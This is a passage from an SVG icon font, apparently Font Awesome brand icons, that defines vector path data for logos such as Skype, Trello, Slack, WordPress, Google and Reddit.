    <glyph glyph-name="skype" unicode="&#xf17e;" horiz-adv-x="447" 
d="M424.7 148.2c14.5996 -18.9004 23.2998 -42.5 23.2002 -68.1006c0 -61.7998 -50.2002 -112 -112 -112c-25.6006 0 -49.2002 8.7002 -68.2002 23.3008c-14.1006 -3 -28.9004 -4.7002 -43.7998 -4.7002c-113.4 0 -205.301 91.7998 -205.301 205.3
c0 14.9004 1.80078 29.7998 4.7002 43.7998c-14.5996 18.9004 -23.2998 42.5 -23.2998 68.2002c0 61.7998 50.2002 112 112 112c25.7002 0 49.2998 -8.7002 68.2998 -23.4004c14.1006 3 28.9004 4.7002 43.7998 4.7002c113.4 0 205.301 -91.7998 205.301 -205.3
c0 -14.9004 -1.80078 -29.7998 -4.7002 -43.7998zM230.1 56.7002c54.9004 0 112 27.3994 112 86.5c0 50.7998 -49.2998 68.2998 -90.6992 77.5996c-48.3008 11.2002 -69.1006 13.2002 -69.1006 33c0 15.5 16.2998 22.5 42 22.5c45.7998 0 46.7002 -33.5 75 -33.5
c18.9004 0 30.2998 14.9004 30.2998 31.7998c0 33.5 -55.6992 55.4004 -110.8 55.4004c-50.5 0 -109.1 -21.9004 -109.1 -81.0996c0 -65.2002 55.2998 -71.8008 117.8 -87.2002c26 -6.40039 42 -9.2998 42 -28c0 -14.9004 -16.5996 -26.2998 -42.2998 -26.2998
c-54 0 -56.9004 44.8994 -88.1006 44.8994c-20.5 0 -29.5 -14.5996 -29.5 -30.5996c0 -35.7998 54.9004 -65 120.5 -65z" />
    <glyph glyph-name="foursquare" unicode="&#xf180;" horiz-adv-x="368" 
d="M323.1 445c40 0 50.7002 -22.7998 42.2002 -65.2002l-48.5996 -243c-3.7002 -14.5 -9.2002 -39.7002 -44.2998 -39.7002h-83.4004c-3.40039 0 -3.7002 0.300781 -6.7998 -3.09961c0 0 -2.2002 -2.5 -131.101 -151.9
c-10.0996 -11.6992 -26.6992 -9.59961 -32.8994 -7.09961c-6.10059 2.40039 -18.2002 9.7998 -18.2002 30.0996v433.801c0 17.7998 12.4004 46.0996 49.9004 46.0996h273.199zM306.8 371.2c2.10059 9.7998 -5.2998 17.5 -13.5 17.5h-219
c-9.7998 0 -16.5996 -8.90039 -16.5996 -16.6006v-338.8c0 -0.899414 0.899414 -1.2002 1.7998 -0.299805c80.5996 96.9004 89.5 108.3 89.5 108.3c9.2998 10.7998 13 12.6006 26.5 12.6006h73.5c10.0996 0 16 8.59961 16.9004 13.5
c0.899414 5 9.59961 49.8994 11.3994 58.7998c1.7998 9 -6.5 18.2002 -14.7998 18.2002h-90.4004c-12 0 -20.5996 8.59961 -20.5996 20.5996v13c0 12 8.59961 20.2998 20.5996 20.2998h106.4c7.40039 0 15.7002 6.7002 16.9004 13.2002z" />
    <glyph glyph-name="trello" unicode="&#xf181;" horiz-adv-x="447" 
d="M392.3 416c30.7998 -0.200195 55.7002 -25.2002 55.6006 -56v-336c0 -30.7998 -24.9004 -55.7998 -55.7002 -56h-336.2c-30.9004 0 -56 25.0996 -56 56c0 340 -0.0996094 336 0 336c0 30.9004 25.0996 56 56.0996 56h336.2zM197 76.7002h0.0996094v254.2
c0 14.8994 -12.0996 26.8994 -26.8994 26.8994h-82.9004c-14.8994 0 -26.8994 -12.0996 -26.8994 -26.8994v-254.2c0.0996094 -14.7998 12.1992 -26.7002 27 -26.6006h82.6992c14.8008 0 26.7002 11.9004 26.9004 26.6006zM390.1 188.7v142.1
c0 14.9004 -12.0996 26.9004 -26.8994 26.9004h-81.1006c-14.7998 0 -26.7998 -12.1006 -26.7998 -26.9004v-142.1c0 -14.9004 12.1006 -26.9004 26.9004 -26.9004h81c14.8994 0 26.8994 12.1006 26.8994 26.9004z" />
    <glyph glyph-name="gratipay" unicode="&#xf184;" horiz-adv-x="496" 
d="M248 440c136.9 0 248 -111.1 248 -248s-111.1 -248 -248 -248s-248 111.1 -248 248s111.1 248 248 248zM362.6 213.6c8.80078 12 19.1006 50.4004 -13.7998 72c-27.7002 18.1006 -54.2002 4.2002 -68.0996 -11.8994c-15.1006 -16.9004 -45.7998 -17.9004 -61.7002 0
c-13.9004 16.0996 -40.4004 30 -68.5 11.8994c-32.7002 -21.5996 -22.2998 -60.0996 -13.5996 -72l112.699 -152.699z" />
    <glyph glyph-name="vk" unicode="&#xf189;" horiz-adv-x="575" 
d="M545 330.3c-7.40039 -34.2998 -79.2998 -135.5 -79.4004 -135.6c-6.19922 -10 -8.69922 -15 0 -26.2002c3.40039 -4.7998 79.1006 -76.5996 90.3008 -111.5c4.89941 -16.5996 -3.60059 -25 -20.4004 -25h-58.9004c-22.3994 0 -29 17.9004 -69 57.9004
c-35 33.6992 -50 38.0996 -58.6992 38.0996c-18.8008 0 -15.4004 -6.2998 -15.4004 -73.0996c0 -14.5 -4.59961 -22.9004 -42.0996 -22.9004c-62.4004 0 -131 37.9004 -179.7 107.8c-73.1006 102.4 -93.1006 179.9 -93.1006 195.5c0 8.7998 3.40039 16.7002 20.2002 16.7002
h58.9004c15.0996 0 20.7998 -6.59961 26.5996 -22.9004c28.7998 -84 77.4004 -157.399 97.4004 -157.399c7.5 0 10.8994 3.5 10.8994 22.5v86.7998c-2.19922 40 -23.3994 43.2998 -23.3994 57.5c0 6.5 5.59961 13.5 15 13.5h92.5996
c12.4004 0 16.6006 -6.7002 16.6006 -21.7002v-116.7c0 -12.5 5.69922 -16.8994 9.39941 -16.8994c7.5 0 13.7998 4.39941 27.5 18.0996c42.4004 47.4004 72.4004 120.5 72.4004 120.5c3.7002 8.7998 10.5996 16.7002 25.5996 16.7002h58.9004
c17.7998 0 21.5 -9.2002 17.7998 -21.7002z" />
    <glyph glyph-name="weibo" unicode="&#xf18a;" horiz-adv-x="511" 
d="M407 270.4c7.59961 24 -13.4004 46.7998 -37.4004 41.6992c-22 -4.7998 -28.7998 28.1006 -7.09961 32.8008c50.0996 10.8994 92.2998 -37.1006 76.5 -84.8008c-6.7998 -21.1992 -38.7998 -10.7998 -32 10.3008zM214.8 1.2998c-106.3 0 -214.8 51.4004 -214.8 136.3
c0 44.3008 28 95.4004 76.2998 143.7c99.7002 99.7002 203.2 100.9 173.601 5.7002c-4 -13.0996 12.2998 -5.7002 12.2998 -6c79.5 33.5996 140.5 16.7998 114 -51.4004c-3.7002 -9.39941 1.09961 -10.8994 8.2998 -13.0996c135.7 -42.2998 34.7998 -215.2 -169.7 -215.2z
M358.5 147.6c-5.40039 55.7002 -78.5 94 -163.4 85.7002c-84.7998 -8.59961 -148.8 -60.2998 -143.399 -116c5.39941 -55.7002 78.5 -94 163.399 -85.7002c84.8008 8.60059 148.801 60.3008 143.4 116zM347.9 412.9c102.3 21.5996 189.3 -74.5 157.399 -174.301
c-8.2998 -25 -44.7998 -12.1992 -37.3994 12c23.0996 71.2002 -39.4004 139.2 -111.7 124c-25.1006 -5.39941 -34.2002 32.7002 -8.2998 38.3008zM269.4 101.9c-17.1006 -38.8008 -66.8008 -60 -109.101 -46.3008c-40.7998 13.1006 -58 53.4004 -40.2998 89.7002
c17.7002 35.4004 63.0996 55.4004 103.4 45.1006c42 -10.8008 63.0996 -50.2002 46 -88.5zM183.1 131.9c-12.8994 5.39941 -30 -0.300781 -38 -12.9004c-8.2998 -12.9004 -4.2998 -28 8.60059 -34c13.0996 -6 30.7998 -0.299805 39.0996 12.9004
c8 13.0996 3.7002 28.2998 -9.7002 34zM215.7 145.3c-5.10059 1.7002 -11.4004 -0.599609 -14.2998 -5.39941c-2.90039 -5.10059 -1.40039 -10.6006 3.69922 -12.9004c5.10059 -2 11.7002 0.299805 14.6006 5.40039c2.7998 5.19922 1.09961 10.8994 -4 12.8994z" />
    <glyph glyph-name="renren" unicode="&#xf18b;" horiz-adv-x="512" 
d="M214 278.9c0 -110.4 -61 -205.4 -147.6 -247.4c-36.4004 43.2998 -58.4004 98.7998 -58.4004 159.9c0 122.699 89.0996 224.399 206 244.1v-156.6zM255 -56c-42.9004 0 -83.2998 11 -118.5 30.4004c57.2002 36.0996 103.4 90.6992 118.5 154.6
c15.5 -63.9004 61.7002 -118.5 118.8 -154.7c-35.0996 -19.2998 -75.5 -30.2998 -118.8 -30.2998zM445.6 31.5c-86.5996 42 -147.6 136.9 -147.6 247.4v156.6c116.9 -19.7002 206 -121.4 206 -244.1c0 -61.1006 -22 -116.601 -58.4004 -159.9z" />
    <glyph glyph-name="pagelines" unicode="&#xf18c;" horiz-adv-x="384" 
d="M384 135.3c-55.0996 -136.7 -187.1 -54 -187.1 -54c-40.5 -81.7998 -107.4 -134.399 -184.601 -134.7c-16.0996 0 -16.5996 24.4004 0 24.4004c64.4004 0.299805 120.5 42.7002 157.2 110.1c-41.0996 -15.8994 -118.6 -27.8994 -161.6 82.2002
c109 44.9004 159.1 -11.2002 178.3 -45.5c9.89941 24.4004 17 50.9004 21.5996 79.7002c0 0 -139.7 -21.9004 -149.5 98.0996c119.101 47.9004 152.601 -76.6992 152.601 -76.6992c1.59961 16.6992 3.2998 52.5996 3.2998 53.3994c0 0 -106.3 73.7002 -38.1006 165.2
c124.601 -43 61.4004 -162.4 61.4004 -162.4c0.5 -1.59961 0.5 -23.7998 0 -33.3994c0 0 45.2002 89 136.4 57.5c-4.2002 -134 -141.9 -106.4 -141.9 -106.4c-4.40039 -27.3994 -11.2002 -53.3994 -20 -77.5c0 0 83 91.7998 172 20z" />
    <glyph glyph-name="stack-exchange" unicode="&#xf18d;" 
d="M17.7002 115.7h412.7v-22c0 -37.7002 -29.3008 -68 -65.3008 -68h-19l-86.7998 -89.7002v89.7002h-176.3c-36 0 -65.2998 30.2998 -65.2998 68v22zM17.7002 139.3v85h412.7v-85h-412.7zM17.7002 248.7v85h412.7v-85h-412.7zM365 448
c36 0 65.2998 -30.2998 65.4004 -67.7002v-22.2998h-412.7v22.2998c0 37.4004 29.2998 67.7002 65.2998 67.7002h282z" />
    <glyph glyph-name="vimeo-square" unicode="&#xf194;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM383.8 266.4c1.90039 41.5996 -13.5996 63 -46.5 64c-44.2998 1.39941 -74.3994 -23.6006 -90.0996 -75.1006
c19.5996 8.40039 48.5996 10.6006 45.2002 -22.2002c-0.900391 -11.0996 -8.10059 -27.0996 -21.5 -48.2998c-37.2002 -58.7002 -46.3008 -39.0996 -66.8008 90.5c-5.7998 36.5 -21.0996 53.5 -46 51.1006c-22 -2 -57.1992 -38 -94.0996 -70.4004l15 -19.4004
c14.2998 10.1006 22.7002 15.1006 25.0996 15.1006c20.8008 0 31.5 -54.1006 56.7002 -146.4c12.9004 -34.3994 28.6006 -51.5996 47.2998 -51.5996c30.1006 0 66.9004 28.2998 110.4 84.7998c42.0996 54.0996 63.9004 96.7998 65.2998 127.9z" />
    <glyph glyph-name="slack" unicode="&#xf198;" 
d="M94.1201 132.9c0 -25.9004 -21.1602 -47.0605 -47.0605 -47.0605c-25.8994 0 -47.0596 21.1602 -47.0596 47.0605c0 25.8994 21.1602 47.0596 47.0596 47.0596h47.0605v-47.0596zM117.84 132.9c0 25.8994 21.1602 47.0596 47.0605 47.0596
c25.8994 0 47.0596 -21.1602 47.0596 -47.0596v-117.841c0 -25.8994 -21.1602 -47.0596 -47.0596 -47.0596c-25.9004 0 -47.0605 21.1602 -47.0605 47.0596v117.841zM164.9 321.88c-25.9004 0 -47.0605 21.1602 -47.0605 47.0605c0 25.8994 21.1602 47.0596 47.0605 47.0596
c25.8994 0 47.0596 -21.1602 47.0596 -47.0596v-47.0605h-47.0596zM164.9 298.16c25.8994 0 47.0596 -21.1602 47.0596 -47.0605c0 -25.8994 -21.1602 -47.0596 -47.0596 -47.0596h-117.841c-25.8994 0 -47.0596 21.1602 -47.0596 47.0596
c0 25.9004 21.1602 47.0605 47.0596 47.0605h117.841zM353.88 251.1c0 25.9004 21.1602 47.0605 47.0605 47.0605c25.8994 0 47.0596 -21.1602 47.0596 -47.0605c0 -25.8994 -21.1602 -47.0596 -47.0596 -47.0596h-47.0605v47.0596zM330.16 251.1
c0 -25.8994 -21.1602 -47.0596 -47.0605 -47.0596c-25.8994 0 -47.0596 21.1602 -47.0596 47.0596v117.841c0 25.8994 21.1602 47.0596 47.0596 47.0596c25.9004 0 47.0605 -21.1602 47.0605 -47.0596v-117.841zM283.1 62.1201c25.9004 0 47.0605 -21.1602 47.0605 -47.0605
c0 -25.8994 -21.1602 -47.0596 -47.0605 -47.0596c-25.8994 0 -47.0596 21.1602 -47.0596 47.0596v47.0605h47.0596zM283.1 85.8398c-25.8994 0 -47.0596 21.1602 -47.0596 47.0605c0 25.8994 21.1602 47.0596 47.0596 47.0596h117.841
c25.8994 0 47.0596 -21.1602 47.0596 -47.0596c0 -25.9004 -21.1602 -47.0605 -47.0596 -47.0605h-117.841z" />
    <glyph glyph-name="wordpress" unicode="&#xf19a;" horiz-adv-x="512" 
d="M61.7002 278.6l101.5 -278c-71 34.4004 -119.9 107.2 -119.9 191.4c0 30.9004 6.60059 60.0996 18.4004 86.5996zM399.6 202.7c0 -18.2002 -7 -39.2998 -16 -68.7002l-21.1992 -70.9004l-76.9004 228.7c12.7998 0.700195 24.2998 2 24.2998 2
c11.4004 1.2998 10.1006 18.2002 -1.39941 17.5c0 0 -34.5 -2.7002 -56.7002 -2.7002c-20.9004 0 -56 2.7002 -56 2.7002c-11.4004 0.700195 -12.7998 -16.7998 -1.2998 -17.5c0 0 10.7998 -1.2998 22.2998 -2l33.0996 -90.7998l-46.5996 -139.6l-77.5 230.399
c12.7998 0.700195 24.2998 2 24.2998 2c11.4004 1.2998 10.0996 18.2002 -1.40039 17.5c0 0 -34.5 -2.7002 -56.6992 -2.7002c-4 0 -8.7002 0.100586 -13.7002 0.300781c38.0996 57.7998 103.5 95.8994 177.8 95.8994c55.4004 0 105.8 -21.2002 143.7 -55.8994
c-1 0.0996094 -1.90039 0.199219 -2.7998 0.199219c-20.9004 0 -35.7002 -18.1992 -35.7002 -37.7998c0 -17.5 10.0996 -32.3994 20.8994 -49.8994c8.10059 -14.2002 17.5 -32.4004 17.5 -58.7002zM259.7 173.4l65.3994 -179.2c0.400391 -1 0.900391 -2 1.5 -2.90039
c-22.0996 -7.7998 -45.7998 -12.0996 -70.5996 -12.0996c-20.9004 0 -41 3.09961 -60.0996 8.7002zM442.7 294.1c16.5996 -30.2998 26 -65.0996 26 -102.1c0 -78.5 -42.5 -147 -105.8 -183.9l65 187.9c12.1992 30.4004 16.1992 54.5996 16.1992 76.2002
c0 7.89941 -0.5 15.0996 -1.39941 21.8994zM504 192c0 -136.8 -111.3 -248 -248 -248c-136.8 0 -248 111.3 -248 248c0 136.8 111.2 248 248 248c136.7 0 248 -111.2 248 -248zM492.6 192c0 130.5 -106.199 236.6 -236.6 236.6c-130.5 0 -236.6 -106.1 -236.6 -236.6
s106.199 -236.6 236.6 -236.6c130.5 0 236.6 106.1 236.6 236.6z" />
    <glyph glyph-name="openid" unicode="&#xf19b;" 
d="M271.5 16l-68 -32c-115 10.2998 -203.5 71.5 -203.5 145.8c0 71.5 82.5 131 191.7 144.3v-43c-71.5 -12.5 -124 -53 -124 -101.3c0 -51 58.5 -93.2998 135.7 -103v340l68 33.2002v-384h0.0996094zM448 157l-131.3 28.5l36.7998 20.7002c-19.5 11.5 -43.5 20 -70 24.7998
v43c46.2002 -5.5 87.7002 -19.5 120.3 -39.2998l35 19.7998z" />
    <glyph glyph-name="yahoo" unicode="&#xf19e;" horiz-adv-x="447" 
d="M252 156l4 -220c-12.7002 2.2002 -23.5 3.90039 -32.2998 3.90039c-8.40039 0 -19.2002 -1.7002 -32.2998 -3.90039l4 220c-55 94.7998 -110.4 196.8 -174 292c11.8994 -3.09961 23 -3.90039 33.1992 -3.90039c9 0 20.4004 0.800781 34.1006 3.90039
c40.8994 -72.2002 82.0996 -138.7 135 -225.5c37.2998 61.5996 91.0996 144.1 134.899 225.5c11.1006 -2.90039 22 -3.90039 32.9004 -3.90039c11.5 0 23.2002 1 35 3.90039c-34.4004 -47.9004 -131.6 -216.9 -174.5 -292z" />
    <glyph glyph-name="google" unicode="&#xf1a0;" horiz-adv-x="488" 
d="M488 186.2c0 -141.5 -96.9004 -242.2 -240 -242.2c-137.2 0 -248 110.8 -248 248s110.8 248 248 248c66.7998 0 123 -24.5 166.3 -64.9004l-67.5 -64.8994c-88.2998 85.2002 -252.5 21.2002 -252.5 -118.2c0 -86.5 69.1006 -156.6 153.7 -156.6
c98.2002 0 135 70.3994 140.8 106.899h-140.8v85.2998h236.1c2.30078 -12.6992 3.90039 -24.8994 3.90039 -41.3994z" />
    <glyph glyph-name="reddit" unicode="&#xf1a1;" horiz-adv-x="512" 
d="M201.5 142.5c-13.7998 0 -24.9004 11.0996 -24.9004 24.5996c0 13.8008 11.1006 24.9004 24.9004 24.9004c13.5996 0 24.5996 -11.0996 24.5996 -24.9004c0 -13.5996 -11.0996 -24.5996 -24.5996 -24.5996zM504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248
s111 248 248 248s248 -111 248 -248zM371.7 233.2c-9.40039 0 -17.7002 -3.90039 -23.7998 -10c-22.4004 15.5 -52.6006 25.5 -86.1006 26.5996l17.4004 78.2998l55.3994 -12.5c0 -13.5996 11.1006 -24.5996 24.6006 -24.5996c13.7998 0 24.8994 11.2998 24.8994 24.9004
c0 13.5996 -11.0996 24.8994 -24.8994 24.8994c-9.7002 0 -18 -5.7998 -22.1006 -13.7998l-61.1992 13.5996c-3 0.800781 -6.10059 -1.39941 -6.90039 -4.39941l-19.0996 -86.4004c-33.2002 -1.39941 -63.1006 -11.2998 -85.5 -26.7998
c-6.10059 6.40039 -14.7002 10.2002 -24.1006 10.2002c-34.8994 0 -46.2998 -46.9004 -14.3994 -62.7998c-1.10059 -5 -1.7002 -10.2002 -1.7002 -15.5c0 -52.6006 59.2002 -95.2002 132 -95.2002c73.0996 0 132.3 42.5996 132.3 95.2002
c0 5.2998 -0.599609 10.7998 -1.90039 15.7998c31.3008 16 19.8008 62.5 -14.8994 62.5zM302.8 117c2.2002 2.2002 6.10059 2.2002 8.2998 0c2.5 -2.5 2.5 -6.40039 0 -8.59961c-22.8994 -22.8008 -87.3994 -22.8008 -110.199 0c-2.5 2.19922 -2.5 6.09961 0 8.59961
c2.19922 2.2002 6.09961 2.2002 8.2998 0c17.5 -17.9004 75.3994 -18.2002 93.5996 0zM310.5 192c13.9004 0 24.9004 -11.0996 24.9004 -24.9004c0 -13.5 -11.1006 -24.5996 -24.9004 -24.5996c-13.5 0 -24.5996 11 -24.5996 24.5996c0 13.8008 11 24.9004 24.5996 24.9004z
" />
    <glyph glyph-name="reddit-square" unicode="&#xf1a2;" 
d="M283.2 102.5c2.7002 -2.7002 2.7002 -6.7998 0 -9.2002c-24.5 -24.5 -93.7998 -24.5996 -118.4 0c-2.7002 2.40039 -2.7002 6.5 0 9.2002c2.40039 2.40039 6.5 2.40039 8.90039 0c18.7002 -19.2002 81 -19.5996 100.5 0c2.39941 2.2998 6.59961 2.2998 9 0zM191.9 156.3
c0 -14.5996 -11.9004 -26.5 -26.5 -26.5c-14.9004 0 -26.8008 11.9004 -26.8008 26.5c0 14.9004 11.9004 26.7998 26.8008 26.7998c14.5996 0 26.5 -11.8994 26.5 -26.7998zM282.6 183.1c14.9004 0 26.8008 -11.8994 26.8008 -26.7998
c0 -14.5996 -11.9004 -26.5 -26.8008 -26.5c-14.5996 0 -26.5 11.9004 -26.5 26.5c0 14.9004 11.9004 26.7998 26.5 26.7998zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM348.3 227.4
c-10.0996 0 -19 -4.2002 -25.5996 -10.7002c-24.1006 16.7002 -56.5 27.3994 -92.5 28.5996l18.7002 84.2002l59.5 -13.4004c0 -14.5996 11.8994 -26.5 26.5 -26.5c14.8994 0 26.7998 12.2002 26.7998 26.8008c0 14.5996 -11.9004 26.7998 -26.7998 26.7998
c-10.4004 0 -19.3008 -6.2002 -23.8008 -14.9004l-65.6992 14.6006c-3.30078 0.899414 -6.5 -1.5 -7.40039 -4.80078l-20.5 -92.7998c-35.7002 -1.5 -67.7998 -12.2002 -91.9004 -28.8994c-6.5 6.7998 -15.7998 11 -25.8994 11c-37.5 0 -49.7998 -50.4004 -15.5 -67.5
c-1.2002 -5.40039 -1.7998 -11 -1.7998 -16.7002c0 -56.5 63.6992 -102.3 141.899 -102.3c78.5 0 142.2 45.7998 142.2 102.3c0 5.7002 -0.599609 11.5996 -2.09961 17c33.5996 17.2002 21.1992 67.2002 -16.1006 67.2002z" />
    <glyph glyph-name="stumbleupon-circle" unicode="&#xf1a3;" horiz-adv-x="512" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 262.5c9.7998 0 17.7998 -8 17.7002 -17.5996v-20.6006l22.8994 -10.7002l34.1006 10.1006v23.7002c0 40.2998 -34 72.5996 -74.7002 72.5996
c-40.5 0 -74.7002 -32.0996 -74.7002 -72.0996v-108.4c0 -9.90039 -8 -17.7998 -17.7998 -17.7998s-17.7998 7.7998 -17.7998 17.7998v45.7998h-57.2998v-46.5c0 -41.3994 33.5 -74.8994 74.8994 -74.8994c41 0 74.9004 33 74.9004 73.8994v106.9
c0 9.7998 8 17.7998 17.7998 17.7998zM423.6 138.9c0 0 0 0.5 0.100586 46.3994h-57.2998v-48c0 -9.7002 -8 -17.5996 -17.8008 -17.5996c-9.7998 0 -17.7998 7.7998 -17.7998 17.5996v47.1006l-34.0996 -10.1006l-22.9004 10.7002v-46.7998
c0 -41 33.7002 -74.2002 74.9004 -74.2002c41.3994 0 74.8994 33.5 74.8994 74.9004z" />
    <glyph glyph-name="stumbleupon" unicode="&#xf1a4;" horiz-adv-x="502" 
d="M502.9 182v-69.7002c0 -62.0996 -50.3008 -112.399 -112.4 -112.399c-61.7998 0 -112.4 49.7998 -112.4 111.3v70.2002l34.3008 -16l51.0996 15.1992v-70.5996c0 -14.7002 12 -26.5 26.7002 -26.5s26.7998 11.7998 26.7998 26.5v72h85.9004zM278.2 240.2v30.8994
c0 14.7002 -12 26.7002 -26.7002 26.7002s-26.7002 -12 -26.7002 -26.7002v-160.3c0 -61.2998 -50.7998 -110.8 -112.399 -110.8c-62.1006 0 -112.4 50.2998 -112.4 112.3v69.7002h86v-68.5996c0 -14.9004 12 -26.7002 26.7002 -26.7002s26.7002 11.7998 26.7002 26.7002
v162.399c0 60 51.2998 108.2 112.1 108.2c61 0 112.1 -48.5 112.1 -109v-35.5996l-51.0996 -15.2002z" />
    <glyph glyph-name="delicious" unicode="&#xf1a5;" 
d="M446.5 380c1 -3.7998 1.5 -7.90039 1.59961 -12v-352.1c0 -26.5 -21.5 -48 -48 -48h-352c-4.09961 0 -8.19922 0.5 -12 1.5c-7.69922 2 -14.5996 5.7998 -20.2998 11c-1.2002 1.09961 -2.2998 2.19922 -3.2998 3.2998c-5.2002 5.7002 -9 12.5996 -11 20.2998
c-1 3.7998 -1.5 7.90039 -1.5 12v352c0 26.5 21.5 48 48 47.9004h352c4.09961 0 8.2002 -0.5 12 -1.5c1.90039 -0.400391 3.7002 -1 5.40039 -1.7002c1.89941 -0.700195 3.69922 -1.5 5.5 -2.5c1.39941 -0.700195 2.69922 -1.5 4 -2.40039
c1.09961 -0.799805 2.19922 -1.59961 3.2998 -2.5c2.5 -2 4.7998 -4.2998 6.89941 -6.7998c1.7002 -2.09961 3.30078 -4.5 4.7002 -6.90039c1.2998 -2.2998 2.40039 -4.59961 3.2998 -7.09961c0.5 -1.5 1 -3 1.40039 -4.5zM416 16v176h-192v192h-176
c-8.7998 0 -16 -7.2002 -16 -16v-176h192v-192h176c8.7998 0 16 7.2002 16 16z" />
    <glyph glyph-name="digg" unicode="&#xf1a6;" horiz-adv-x="512" 
d="M81.7002 275.7v76.2998h51v-250.7h-132.7v174.4h81.7002zM81.7002 142.3v92.2998h-30.7998v-92.2998h30.7998zM378.9 275.7h133.1v-243.7h-133.1v40.7998h81.7998v28.5h-81.7998v174.4zM460.7 142.3v92.2998h-30.7998v-92.2998h30.7998zM225.1 101.3v174.4h133.301
v-243.7h-133.301v40.7998h82.1006v28.5h-82.1006zM276.3 234.6v-92.2998h30.7998v92.2998h-30.7998zM153.3 352h51.2998v-51h-51.2998v51zM153.3 275.7h51.2998v-174.4h-51.2998v174.4z" />
    <glyph glyph-name="pied-piper-pp" unicode="&#xf1a7;" 
d="M205.3 273.4c0 -21.1006 -14.2002 -38.1006 -31.7002 -38.1006c-7.09961 0 -12.7998 1.2002 -17.1992 3.7002v68c4.39941 2.7002 10.0996 4.2002 17.1992 4.2002c17.5 0 31.7002 -16.9004 31.7002 -37.7998zM257.9 206.4c17.3994 0 31.6992 -17 31.6992 -38.1006
c0 -20.8994 -14.2998 -37.7998 -31.6992 -37.7998c-7.10059 0 -12.8008 1.2002 -17.2002 3.7002v68c4.39941 2.7002 10.0996 4.2002 17.2002 4.2002zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352
c26.5 0 48 -21.5 48 -48zM185 192.9c41 0 74.2002 35.5996 74.2002 79.5996s-33.2002 79.5996 -74.2002 79.5996c-12 0 -24.0996 -3.19922 -34.5996 -8.7998h-45.7002v-206.3l51.7998 10.0996v50.6006c8.59961 -3.10059 18.0996 -4.7998 28.5 -4.7998zM343.4 167.6
c0 44 -33.2002 79.6006 -73.9004 79.6006c-3.2002 0 -6.40039 -0.200195 -9.59961 -0.700195c-3.7002 -12.5 -10.1006 -23.7998 -19.2002 -33.4004c-13.7998 -15 -32.2002 -23.7998 -51.7998 -24.7998v-156.3l51.7998 10.0996v50.6006
c8.59961 -3.2002 18.2002 -4.7002 28.7002 -4.7002c40.7998 0 74 35.5996 74 79.5996z" />
    <glyph glyph-name="pied-piper-alt" unicode="&#xf1a8;" horiz-adv-x="576" 
d="M244 202l-27.7002 -5.7002l-1.7002 4.90039c6.7002 0.5 12.7002 3.7002 19.3008 3.7002c3.7998 0 6.89941 -0.900391 10.0996 -2.90039zM379.9 4.09961c9.5 0 28.1992 -45.0996 33 -55.0996c-35.9004 -13.4004 -70.3008 -15.9004 -106 -9.7998l-6.90039 45.0996
c15.7998 10.2998 60.9004 19.7998 79.9004 19.7998zM340.8 271c-7.59961 3.5 -63.8994 6.40039 -98.7998 -10c6.2998 11.7998 13.2002 17 25.9004 21.7998c27.2998 10.2998 40.1992 30.5 58.8994 51.1006c11.9004 -8.40039 12 -24.6006 31.6006 -23v-21.8008
l6.2998 -0.299805c37.3994 14.4004 74.7002 30.2002 106.6 54.6006c48.2998 36.7998 52.9004 50 81.2998 100l2 2.59961c-0.599609 -14.0996 -6.2998 -27.2998 -12.3994 -39.9004c-30.5 -63.7998 -78.7002 -100.3 -146.8 -116.699
c-12.4004 -2.90039 -26.4004 -3.2002 -37.6006 -8.90039c1.40039 -9.7998 13.2002 -18.0996 13.2002 -23c0 -3.40039 -5.5 -7.2002 -7.5 -8.59961c-11.2002 12.8994 -16.0996 19.2998 -22.7002 22.0996zM555.5 448l-0.299805 -1.40039l-0.600586 -0.599609
l0.300781 0.900391zM496.3 65.9004c20.1006 -34.2002 43.7002 -54.3008 72.7002 -79.9004c-31 -19.2998 -70.4004 -32.2002 -103.5 -47.2002c-55.2002 46.2998 -23 229.9 -111.5 229.9c-3.5 -0.700195 -2.40039 -0.299805 -4.59961 -1.7002
c1.09961 -1.40039 2.59961 -2.90039 3.69922 -4c23.9004 -20.0996 33.4004 -24.4004 34.8008 -58.5996l0.299805 -9.5c0.799805 -21.6006 -5.5 -42.5 -9.7998 -63.5c-25.9004 0.699219 -51.2002 -11 -77.9004 -2.90039c-0.700195 5.90039 -1.09961 30.9004 0.299805 41.0996
c1.40039 9.5 33.6006 29.9004 33 43.7002c-5.5 0.600586 -9.2002 -2.59961 -12.3994 -6.89941c-13.3008 -19.5 -47.2002 -41.9004 -71.3008 -41.9004c-16.5996 0 -56.2998 71.5 -76.3994 85.9004c-3.2002 2.2998 -5.2002 5.39941 -7.7998 8.59961
c-16.1006 -3.7998 -139.4 -32.2002 -147.4 -32.2002c-6 0 -11.5 4.90039 -11.5 10.9004c0 5.5 3.40039 10.7002 8.90039 11.7998l139.6 30.4004c-9.5 17.1992 12.2998 17.5 21.5 20.0996c3.2002 0.799805 6.2998 4 9.5 4c6.2998 0 11.7998 -8.90039 13.7998 -14.0996
c6.2998 1.39941 45.7002 10.5996 49.4004 10.5996c15.2002 0 15.8994 -20.0996 2.89941 -22.7002l-52.2998 -11.5l-0.299805 -4.59961c-0.299805 -10.1006 45.4004 -60.1006 53.4004 -60.1006c18.0996 0 54.8994 41.7002 54.8994 60.1006
c0 30.7002 -42.7998 12.5996 -42.7998 33.5996c0 3.5 1.2002 6.60059 2.90039 9.7998l-19.5 5.5c13.0996 13.6006 13.7998 31.7002 10.8994 50.3008c14.7002 2.89941 26.7002 4.59961 41.4004 4.59961c56.8994 0 45.7002 -8.59961 65.5 -54.2998l14.3994 7.2002
c-2.2998 -34.2002 -36.1992 -17.5 -35.0996 -31l0.299805 -6c74.7002 2.89941 116.101 -58.6006 150 -115.5zM300.1 19.7998h8.90039l2.90039 -23.7998l-11.8008 -3.40039v27.2002zM231.4 170.2l13.7998 3.5l31.2998 -50.9004l-21 -13.7998zM315.8 15.2998
